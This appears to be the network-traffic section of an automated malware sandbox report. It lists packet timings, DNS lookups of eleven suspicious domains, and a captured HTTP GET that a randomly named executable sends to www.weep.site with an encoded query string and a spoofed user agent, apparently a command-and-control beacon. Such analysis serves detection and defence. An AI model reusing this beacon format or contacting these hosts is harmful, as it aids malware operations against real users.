                                        Sep 3, 2024 13:55:49.019323111 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019337893 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019349098 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019361019 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019371033 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.019372940 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.019393921 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.024038076 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024049997 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024089098 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024100065 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.024205923 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.028718948 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.028731108 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.028740883 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.028906107 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.092508078 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.092551947 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.092562914 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.092606068 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.095099926 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.097275972 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.097289085 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.099865913 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.099878073 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.099895954 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.102001905 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.102015018 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.102031946 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.104573011 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.104592085 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.104603052 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.104631901 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.104631901 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.106719971 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.106740952 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.107094049 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.109388113 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.109400034 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111479998 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111493111 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111504078 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.111507893 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.113121033 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.114168882 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.114181995 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.116168976 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.116182089 CEST8049771162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:49.116235971 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.116235971 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:49.894484997 CEST4977180192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.907097101 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.912003040 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.919193983 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.925137043 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:50.929977894 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.929989100 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930005074 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930013895 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930022001 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930130959 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930140018 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930145025 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:50.930179119 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697757959 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697773933 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697783947 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697794914 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697808027 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697818995 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697829962 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697839975 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697845936 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.697851896 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697866917 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.697889090 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.697909117 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.702735901 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.702784061 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.702876091 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.703064919 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.772559881 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.787683010 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787703037 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787717104 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787729979 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787744045 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.787744045 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.787772894 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.788081884 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788093090 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788105011 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788117886 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.788144112 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788153887 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.788156033 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.788234949 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789256096 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789268017 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789278984 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789290905 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789303064 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789307117 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789336920 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789800882 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789841890 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789844036 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789861917 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789874077 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789885044 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.789906979 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.789936066 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.790714979 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.790760994 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.790772915 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.790801048 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.792558908 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.792603016 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877027988 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877042055 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877059937 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877070904 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877084017 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877087116 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877125978 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877177954 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877197027 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877207994 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877218962 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877218962 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877232075 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877269983 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877299070 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877479076 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877528906 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877540112 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877574921 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.877966881 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877976894 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877986908 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.877990961 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878000975 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878011942 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878031969 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878056049 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878243923 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878253937 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878263950 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878276110 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878284931 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878288031 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878302097 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878313065 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878339052 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:51.878458023 CEST8049772162.55.254.209192.168.2.4
                                        Sep 3, 2024 13:55:51.878494024 CEST4977280192.168.2.4162.55.254.209
                                        Sep 3, 2024 13:55:52.682677984 CEST4977280192.168.2.4162.55.254.209

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 3, 2024 13:53:31.054550886 CEST5297153192.168.2.41.1.1.1
                                        Sep 3, 2024 13:53:31.802867889 CEST53529711.1.1.1192.168.2.4
                                        Sep 3, 2024 13:53:47.828717947 CEST6495853192.168.2.41.1.1.1
                                        Sep 3, 2024 13:53:47.848047018 CEST53649581.1.1.1192.168.2.4
                                        Sep 3, 2024 13:54:01.577070951 CEST6035253192.168.2.41.1.1.1
                                        Sep 3, 2024 13:54:01.615005016 CEST53603521.1.1.1192.168.2.4
                                        Sep 3, 2024 13:54:15.279043913 CEST5257053192.168.2.41.1.1.1
                                        Sep 3, 2024 13:54:15.289107084 CEST53525701.1.1.1192.168.2.4
                                        Sep 3, 2024 13:54:28.358705997 CEST6232353192.168.2.41.1.1.1
                                        Sep 3, 2024 13:54:28.540698051 CEST53623231.1.1.1192.168.2.4
                                        Sep 3, 2024 13:54:42.280206919 CEST6190753192.168.2.41.1.1.1
                                        Sep 3, 2024 13:54:42.387837887 CEST53619071.1.1.1192.168.2.4
                                        Sep 3, 2024 13:54:55.623855114 CEST6274853192.168.2.41.1.1.1
                                        Sep 3, 2024 13:54:55.930860996 CEST53627481.1.1.1192.168.2.4
                                        Sep 3, 2024 13:55:09.201997995 CEST6018553192.168.2.41.1.1.1
                                        Sep 3, 2024 13:55:09.374074936 CEST53601851.1.1.1192.168.2.4
                                        Sep 3, 2024 13:55:23.766077042 CEST5490953192.168.2.41.1.1.1
                                        Sep 3, 2024 13:55:23.920747042 CEST53549091.1.1.1192.168.2.4
                                        Sep 3, 2024 13:55:32.028116941 CEST6279253192.168.2.41.1.1.1
                                        Sep 3, 2024 13:55:32.151827097 CEST53627921.1.1.1192.168.2.4
                                        Sep 3, 2024 13:55:45.627090931 CEST5952753192.168.2.41.1.1.1
                                        Sep 3, 2024 13:55:45.665302038 CEST53595271.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 3, 2024 13:53:31.054550886 CEST192.168.2.41.1.1.10x6e9fStandard query (0)www.weep.siteA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:53:47.828717947 CEST192.168.2.41.1.1.10x96d3Standard query (0)www.88nn.proA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:01.577070951 CEST192.168.2.41.1.1.10xa9b1Standard query (0)www.fontanerourgente.netA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:15.279043913 CEST192.168.2.41.1.1.10xb002Standard query (0)www.onlytradez.clubA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:28.358705997 CEST192.168.2.41.1.1.10xac12Standard query (0)www.32wxd.topA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:42.280206919 CEST192.168.2.41.1.1.10x3da5Standard query (0)www.jaxo.xyzA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:55.623855114 CEST192.168.2.41.1.1.10xfbf1Standard query (0)www.xforum.techA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:09.201997995 CEST192.168.2.41.1.1.10x5253Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:23.766077042 CEST192.168.2.41.1.1.10x216dStandard query (0)www.taapbit.onlineA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:32.028116941 CEST192.168.2.41.1.1.10x9669Standard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:45.627090931 CEST192.168.2.41.1.1.10x93d3Standard query (0)www.anaidittrich.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 3, 2024 13:53:31.802867889 CEST1.1.1.1192.168.2.40x6e9fNo error (0)www.weep.siteweep.siteCNAME (Canonical name)IN (0x0001)false
                                        Sep 3, 2024 13:53:31.802867889 CEST1.1.1.1192.168.2.40x6e9fNo error (0)weep.site194.233.65.154A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:53:47.848047018 CEST1.1.1.1192.168.2.40x96d3No error (0)www.88nn.pro45.157.69.194A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:01.615005016 CEST1.1.1.1192.168.2.40xa9b1No error (0)www.fontanerourgente.netfontanerourgente.netCNAME (Canonical name)IN (0x0001)false
                                        Sep 3, 2024 13:54:01.615005016 CEST1.1.1.1192.168.2.40xa9b1No error (0)fontanerourgente.net37.187.158.211A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:15.289107084 CEST1.1.1.1192.168.2.40xb002No error (0)www.onlytradez.club167.172.133.32A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:28.540698051 CEST1.1.1.1192.168.2.40xac12No error (0)www.32wxd.top32wxd.topCNAME (Canonical name)IN (0x0001)false
                                        Sep 3, 2024 13:54:28.540698051 CEST1.1.1.1192.168.2.40xac12No error (0)32wxd.top206.119.82.116A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:42.387837887 CEST1.1.1.1192.168.2.40x3da5No error (0)www.jaxo.xyz66.29.149.180A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:54:55.930860996 CEST1.1.1.1192.168.2.40xfbf1No error (0)www.xforum.tech103.224.182.242A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:09.374074936 CEST1.1.1.1192.168.2.40x5253No error (0)www.cannulafactory.top18.183.3.45A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:23.920747042 CEST1.1.1.1192.168.2.40x216dName error (3)www.taapbit.onlinenonenoneA (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:32.151827097 CEST1.1.1.1192.168.2.40x9669No error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false
                                        Sep 3, 2024 13:55:45.665302038 CEST1.1.1.1192.168.2.40x93d3No error (0)www.anaidittrich.com162.55.254.209A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.weep.site
                                        • www.88nn.pro
                                        • www.fontanerourgente.net
                                        • www.onlytradez.club
                                        • www.32wxd.top
                                        • www.jaxo.xyz
                                        • www.xforum.tech
                                        • www.cannulafactory.top
                                        • www.ayypromo.shop
                                        • www.anaidittrich.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449736194.233.65.154806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:53:31.821599960 CEST479OUTGET /v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.weep.site
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:53:32.768141985 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:53:32 GMT
                                        Server: Apache
                                        Accept-Ranges: bytes
                                        Cache-Control: no-cache, no-store, must-revalidate
                                        Pragma: no-cache
                                        Expires: 0
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html
                                        Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                        Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                        Sep 3, 2024 13:53:32.768157959 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                        Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                        Sep 3, 2024 13:53:32.768168926 CEST1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                        Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                        Sep 3, 2024 13:53:32.768213987 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                        Sep 3, 2024 13:53:32.768224955 CEST1236INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                        Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                        Sep 3, 2024 13:53:32.768234968 CEST1236INData Raw: 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b 34 5a 50 70 35 71 68 35 43 70 34 56 46 69 4c 38
                                        Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                        Sep 3, 2024 13:53:32.768246889 CEST776INData Raw: 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f 34 76 6f 63 36 72 5a 6b 41 33 42 70 76 33 6e 6a 66 53 2f 6e 68 52 37 38 31 45 35 34 4e 36 74 34 4f 65 57 78 51 78 75 6b 6e
                                        Data Ascii: DBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5Sf
                                        Sep 3, 2024 13:53:32.768424034 CEST1236INData Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                                        Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
                                        Sep 3, 2024 13:53:32.768445969 CEST224INData Raw: 74 22 3e 0d 0a 31 61 63 0d 0a 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73
                                        Data Ascii: t">1acThe server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items"> <u
